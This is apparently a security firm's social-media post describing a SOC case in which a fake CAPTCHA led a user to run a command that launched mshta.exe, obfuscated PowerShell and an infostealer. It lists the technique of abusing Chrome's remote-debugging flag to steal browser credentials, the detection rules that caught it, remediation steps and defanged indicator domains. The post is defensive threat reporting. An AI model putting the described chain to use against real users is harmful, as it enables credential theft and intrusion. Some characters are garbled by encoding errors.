Hunt & HackettJun 5, 2025

Launching #DetectionsFromTheSOC ๐Ÿš€

We're excited to announce our new series, ๐˜‹๐˜ฆ๐˜ต๐˜ฆ๐˜ค๐˜ต๐˜ช๐˜ฐ๐˜ฏ๐˜ด ๐˜ง๐˜ณ๐˜ฐ๐˜ฎ ๐˜ต๐˜ฉ๐˜ฆ ๐˜š๐˜–๐˜Š, in which we share a behind-the-scenes look of how our SOC detects, investigates, and responds to real-world threats.

Case #1: Infostealer via fake CAPTCHA

We intercepted an attack where the intruder didnโ€™t break in, but logged in. The entry point? A fake โ€œIโ€™m not a robotโ€ CAPTCHA prompt.

๐Ÿ‘‰ Want to read the full story? Head on over to our LinkedIn to check it out: https://www.linkedin.com/feed/update/urn:li:activity:7336321179005165568

#detectionsfromthesoc #captcha #infostealer #cryptbot #soc #bec | Hunt & Hackett

Launching #DetectionsFromTheSOC ๐Ÿš€ We're happy to announce our new series, ๐˜‹๐˜ฆ๐˜ต๐˜ฆ๐˜ค๐˜ต๐˜ช๐˜ฐ๐˜ฏ๐˜ด ๐˜ง๐˜ณ๐˜ฐ๐˜ฎ ๐˜ต๐˜ฉ๐˜ฆ ๐˜š๐˜–๐˜Š, in which we share a behind-the-scenes look of how our SOC detects, investigates, and responds to real-world threats. ๐…๐จ๐ซ ๐จ๐ฎ๐ซ ๐Ÿ๐ข๐ซ๐ฌ๐ญ ๐ž๐๐ข๐ญ๐ข๐จ๐ง: ๐ข๐ง๐Ÿ๐จ๐ฌ๐ญ๐ž๐š๐ฅ๐ž๐ซ ๐๐ž๐ฉ๐ฅ๐จ๐ฒ๐ž๐ ๐ฏ๐ข๐š ๐Ÿ๐š๐ค๐ž ๐‚๐š๐ฉ๐ญ๐œ๐ก๐š  In the middle of the night, Hunt & Hackettโ€™s 24/7 SOC intercepted the early stages of a broader cyberattack. The attacker didnโ€™t break in, but logged in.     An endpoint was compromised using a fake #CAPTCHA page โ€“ you know, one of those โ€œIโ€™m not a robotโ€ checks. Only this one tricked the user into running a command via the keyboard shortcut Win + R. That command launched a hidden process and deployed a known #infostealer, likely #Cryptbot.    ๐–๐ก๐š๐ญ ๐ก๐š๐ฉ๐ฉ๐ž๐ง๐ž๐?   Our SOC flagged a suspicious mshta.exe process making an outbound connection to a previously unknown domain. This quickly escalated: ๐Ÿ‘‰ User was tricked into copy-pasting a command that secretly launched mshta.exe  ๐Ÿ‘‰ mshta.exe triggered PowerShell, which contacted additional anomalous domains and executed fileless malware  ๐Ÿ‘‰ PowerShell launched Chrome/Edge with the --remote-debugging-port=9203 flag โ€“ a known abuse method to extract browser credentials  ๐Ÿ‘‰ The process accessed files in the Downloads folder All signs pointed to credential theft and system reconnaissance.    ๐‡๐จ๐ฐ ๐ฐ๐ž ๐๐ž๐ญ๐ž๐œ๐ญ๐ž๐ ๐ข๐ญ:   One of our behavioural detection rules flagged:  ๐Ÿ‘‰ Use of mshta.exe in user context reaching unknown domains   ๐Ÿ‘‰Obfuscated PowerShell activity   ๐Ÿ‘‰Abuse of --remote-debugging-port in Chrome โ€“ a known credential-stealing tactic  This combination triggered a high-confidence detection, prompting an alert at our #SOC and enabling a fast response & remediation โ€“ even at 3AM.    ๐‘๐ž๐ฆ๐ž๐๐ข๐š๐ญ๐ข๐จ๐ง:  ๐Ÿ‘‰ Clean install of the endpoint  ๐Ÿ‘‰ Blocked malicious domains  ๐Ÿ‘‰ Revoked all sessions and reset credentials    This case shows how infostealers can be the first step in modern attacks, giving threat actors access to credentials, browser sessions, and local files. From there, they can move laterally, escalate privileges, and pave the way for bigger attacks like ransomware or business email compromise (#BEC) without you knowing it. In short: infostealers are a launchpad for full-scale breaches.    ๐ˆ๐Ž๐‚๐ฌ:  ๐Ÿ‘พ hxxps[:]//afliam[.]shop  ๐Ÿ‘พ b[.]watchcollision[.]xyz  ๐Ÿ‘พ blisspicks[.]shop